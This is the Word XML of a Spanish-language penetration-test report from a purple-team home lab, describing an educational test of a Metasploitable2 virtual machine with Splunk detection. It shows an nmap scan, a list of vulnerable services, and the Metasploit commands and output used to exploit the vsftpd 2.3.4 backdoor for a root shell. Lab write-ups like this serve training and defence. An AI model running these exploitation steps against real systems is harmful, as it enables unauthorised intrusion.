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sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="2E4057" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E4057" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="2E4057" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">  REPORTE DE PRUEBA DE PENETRACIÓN  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E4057"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Purple Team Home Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="480" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1B6CA8"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable2 — Evaluación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Preparado por</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Fernando Sanchez Juarez</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Fecha</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22 – 23 Junio 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Clasificación</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CONFIDENCIAL — Solo para fines educativos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Objetivo</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Metasploitable2 (192.168.0.129)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Entorno</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Home Lab — VMware Workstation Pro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Versión</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1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="2E4057" w:val="clear"/>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  1. Resumen Ejecutivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Se realizó una prueba de penetración sobre el entorno de laboratorio Metasploitable2 (192.168.0.129) desde una máquina atacante Kali Linux (192.168.0.128) en un entorno controlado de VMware Workstation Pro. El objetivo fue identificar y explotar vulnerabilidades conocidas, y posteriormente detectarlas mediante reglas de correlación en Splunk Enterprise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Durante la evaluación se identificaron múltiples vulnerabilidades críticas. Se logró obtener acceso root completo al sistema objetivo mediante la explotación de un backdoor en el servicio FTP vsftpd 2.3.4. Adicionalmente, se ejecutó un ataque de fuerza bruta contra el servicio FTP, demostrando credenciales débiles en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Todos los ataques fueron detectados exitosamente mediante queries SPL en Splunk, con un dashboard de detección activo capturando el tráfico malicioso en tiempo real.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Resumen de Hallazgos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Cantidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Crítica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1</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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">0</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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Baja</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="2E4057" w:val="clear"/>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  2. Alcance y Metodología</w:t>
      </w:r>
    </w:p>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2.1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Objetivo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Metasploitable2 (192.168.0.129)</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2E4057"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Atacante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Kali Linux (192.168.0.128)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Entorno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VMware Workstation Pro — Red NAT</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2E4057"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Fechas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 – 23 Junio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Tipo de prueba</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Caja negra — sin conocimiento previo del sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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2.2 Herramientas utilizadas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap 7.93 — Reconocimiento y escaneo de puertos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework v6.3.16 — Explotación de vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Hydra v9.6 — Ataques de fuerza bruta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Splunk Enterprise 10.4.0 — Detección y análisis de logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump — Verificación de tráfico de red</w:t>
      </w:r>
    </w:p>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2.3 Metodología</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">La prueba siguió las fases estándar de un pentest:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconocimiento — Escaneo de red y enumeración de servicios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis de vulnerabilidades — Identificación de servicios vulnerables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Explotación — Ejecución de exploits y ataques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-explotación — Verificación de acceso obtenido</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Detección — Correlación de eventos en Splunk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Documentación — Reporte de hallazgos y recomendaciones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="2E4057" w:val="clear"/>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  3. Reconocimiento</w:t>
      </w:r>
    </w:p>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3.1 Escaneo de puertos — Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Se realizó un escaneo completo de puertos y detección de versiones sobre el objetivo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -sV -O 192.168.0.129</w:t>
      </w:r>
    </w:p>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3.2 Servicios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Puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>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Estado</w:t>
            </w:r>
          </w:p>
        </w:tc>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Servicio</w:t>
            </w:r>
          </w:p>
        </w:tc>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Versión</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21/tcp</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FTP</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vsftpd 2.3.4 ⚠️</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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22/tcp</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SSH</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OpenSSH 4.7p1</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23/tcp</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Telnet</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Linux telnetd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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80/tcp</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HTTP</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Apache 2.2.8</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139/tcp</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NetBIOS</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Samba smbd 3.X-4.X</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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1524/tcp</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Bindshell</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Metasploitable root shell ⚠️</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3306/tcp</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MySQL</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sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MySQL 5.0.51a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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6667/tcp</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Abierto</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IRC</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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">UnrealIRCd ⚠️</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="2E4057" w:val="clear"/>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  4. Hallazgos y Explotación</w:t>
      </w:r>
    </w:p>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4.1 HALLAZGO-001 — Backdoor en vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FADBD8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERIDAD: CRÍTICA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CVE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CVE-2011-2523</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2E4057"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Puerto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21/tcp — FTP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Servicio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vsftpd 2.3.4</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2E4057"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Vector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 — Explotación remota sin autenticación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Impacto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Acceso root completo al sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E4057"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Descripción</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">La versión vsftpd 2.3.4 contiene un backdoor malicioso introducido en el código fuente. Al enviar una cadena de usuario que contiene ':)' (smiley face), el servidor abre una shell con privilegios root en el puerto 6200, permitiendo acceso total al sistema sin autenticación.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E4057"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Pasos de explotación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOSTS 192.168.0.129</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E4057"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado obtenido</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Se obtuvo una shell interactiva con privilegios root en el sistema objetivo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] 192.168.0.129:21 - UID: uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Found shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Command shell session opened (192.168.0.128 -&gt; 192.168.0.129:6200)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
    </w:p>
